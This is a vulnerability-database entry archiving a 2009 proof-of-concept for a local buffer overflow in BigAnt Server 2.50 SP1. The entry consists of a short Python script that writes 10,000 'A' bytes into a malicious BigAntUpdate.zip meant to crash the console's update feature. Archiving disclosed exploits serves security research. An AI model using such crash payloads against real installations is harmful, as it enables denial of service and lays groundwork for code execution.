Lucene search
K

BigAnt Server 2.50 SP1 - .zip Local Buffer Overflow (PoC)

🗓️ 16 Sep 2009 00:00:00Reported by Dr_IDEType 
exploitpack
 exploitpack
👁 8 Views

BigAnt Server 2.50 SP1 - .zip Local Buffer Overflow (PoC) by Dr_IDE with 10000 "A"s buffer input

Code
#!/usr/bin/env python

#######################################################################
#
# BigAnt Server 2.50 SP1 Local Buffer Overflow PoC
# Found By: 	Dr_IDE
# Tested:   	XPSP3
# Usage:	Open BigAnt Console, Go to Update, Browse to zip, Boom.
#
#######################################################################

buff = ("\x41" * 10000)

f1 = open("BigAntUpdate.zip","w")
f1.write(buff)
f1.close()

# milw0rm.com [2009-09-16]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Sep 2009 00:00Current
0.9Low risk
Vulners AI Score0.9
8